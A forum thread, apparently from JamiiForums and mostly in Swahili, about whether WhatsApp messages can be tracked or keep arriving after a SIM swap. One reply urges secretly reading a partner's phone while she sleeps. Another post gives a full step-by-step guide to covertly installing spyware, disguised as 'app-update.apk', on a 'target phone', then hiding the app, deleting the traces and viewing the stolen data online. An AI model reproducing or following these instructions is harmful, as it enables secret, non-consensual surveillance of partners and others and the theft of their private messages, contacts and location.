Unawezaje kutrack sms za whatsup?

Nilikua na simu naitumia nikatoa line nikampa dogo cha ajabu dogo alipoweka line yake akendelea kupokea na kutuma maseji kwa acc yangu lakini no yake

Mkuu hilo linawezekana sana.

Swali la msingi je, hiyo simu yako ulijiunga kwa namba ile ile ambayo ulitumia kwenye simu ya mwanzo?
 

We jamaa acha uongo. Haiwezekani.
Ova.
 

Duh yaani unamdanganya jamaa kama amekufa vile haiwezekani hiyo,kwanza ukijaza namba ambayo tayari inatumika haikupi hiyo code na itakujulisha namba tayari inatumika
 
mkuu networker mimi natumia galaxy s3,ina acces net vizuri kabisa but ina sumbua kweny whatsapp esp kweny kudownload and ku upload videos na images nimetumia mbinu zote but inashindikana nimeifuta na kuinstall upya mambo ni yale yale.msaada pliz.
 
Last edited by a moderator:
Mkuu hilo linawezekana sana.

Swali la msingi je, hiyo simu yako ulijiunga kwa namba ile ile ambayo ulitumia kwenye simu ya mwanzo?
Nilikwenda mkoani wakati narudi nikampa dogo smartphone yangu akanipa simu yake ya kawaida ili niwe hewani
Kesho yake asubuhi ananiambia bro mbona maseji zako za watsapp zinaingia kama kawaida, sikuamini ikabidi nichart na jamaa ikawa fresh jamaa anaona namba yangu wakti anachati kwa kutumia simcard ya dogo
Ilibidi niitoe kisha tukainstall upya kwa kusajili no ya dogo

Hivyo sijui ingekuwaje kama ningeweka line yangu kwenye smartphone nyingine........je wote tungeendelea kupokea?
 

uongo kabisa huu, ukifanya hivyo ni kweli utapata sms zote anazotumiwa lakini yeye kwake zitakuwa hazifiki, what kwenye simu mtu unauwezo wa kusajili namba moja tu vivyo hivyo zinaenda kwenye namba isiyosajiliwa tu. Jaribu njia nyingine mkuu.
 
hicho kitu kinawezekana mfano mimi natumia line ya tigo kwa watsap lkn nlivoona inasumbua netwok nikaweka voda lakini bila kubadilisha number watsap. Kwa maana. Hiyo huku napata message za watsap kupitia line yangu ya voda lakini watu wananiona natumia ile ile ya tigo

Sent from my BlackBerry 9300 using JamiiForums
 
Ushauri wangu mvizie tu shori wako akiwa amekwenda chooni au kama mmelala nae usiku wa manane chukua simu yake na ufungue hiyo whatsapp messenger yake ukutane na ugonjwa wa moyo.. Maana hizi "beib" na "hun" zimekuwa nyingi mno kwenye chat kuliko kwingine kokote..
 
[h=4] Download: app-update.apk


1. Prepare your device
[/h]

  • 1.1 Allow installation of non-market application
    • Settings > Security
    • Check the Unknown sources session
  • 1.2 Check for Google Play Services
    • Settings > Apps
    • Check if there Google Play Services is in list. Launch Google Play Store to install the service if it isn't in the list. Usually it is installed by default from Android 4.x. A Google account is required to run Google Play Store
  • 1.3 Enable Location Access
    • Settings > Location access
    • Enable either GPS or wireless network location access method.
      It is required to obtain the phone location.





[h=4] 2. Install SpyApp to your target phone [/h]

  • 2.1 Download the apk
    • Open phone browser
    • Launch d.spyapp.net and download the apk. The file name should be app-update.apk. Check the phone's downloads session after it finish downloading.
      Make sure the phone is connected to the internet.




  • 2.2 Install SpyApp
    • Tap the app-update.apk to start installation wizard then follow the on-screen instructions
    • Tap Open when it shown







[h=4] 3. Bind the target phone to your account [/h]

  • 3.1 Accept term of uses
    • Tap Agree to continue
    • Tap Activate to allow activate Device Administration for spyapp
    • Turn On Google's location service then go back
    • If Google Play Service is not available, a dialog will drive you to download and install it.
      How does it look like?




  • 3.2 Login or create an account
    • If you already have SpyApp Account, type your account details and login
    • If you are new to spyapp, tap 'Don't have SpyApp Account?'




  • 3.3 Start SpyApp
    • Allow Super User Access if asked(root phones only). For rooted phones, an dialog showed ask you to allow SpyApp running with supper user privilege.
    • For non-rooted phones: Tap Start App to start spying
    • For rooted phones: Tap Reboot to reboot and start spying.
    • Installation is finished. SpyApp start working silently and continuously from now on.




  • 3.4 Hide App
    • Call *#121212# and make sure 'Enable Device Admin' is checked.
    • For rooted phones: run SuperUser/SuperSu Tap 'Setting' and Turn Off 'Notifications'




  • 3.5 Delete installation files
    • Lauch Downloads.
    • Remove all app-update.apk files
    • Delete spyapp urls on the browser history






[h=4] 4. View uploaded data [/h]

    • Login to your SpyApp Account
    • Once you are done with the installation, just login to your online SpyApp Control Panel by going to our Login page. SpyApp needs at least 5 minutes to show complete phone information for first time.



Note that for large data such as long contact list, big movie files... requires longer time to upload.
The all installation would takes less than 3 minutes. You can practice on your own phone before do it real on the target phone.
 
Jaribu hiyo ila usisahau kuleta mrejesho. Kumbuka hii ni trial version kiongozi.
 
Good Words ila hi thread ya tangu 2013 nyie mmetoa comments 2014.... Updates kibao zishafanyika whats app.... kwa sasa hili haliwezekani tena
 
Cookies are required to use this site. You must accept them to continue using the site. Learn more…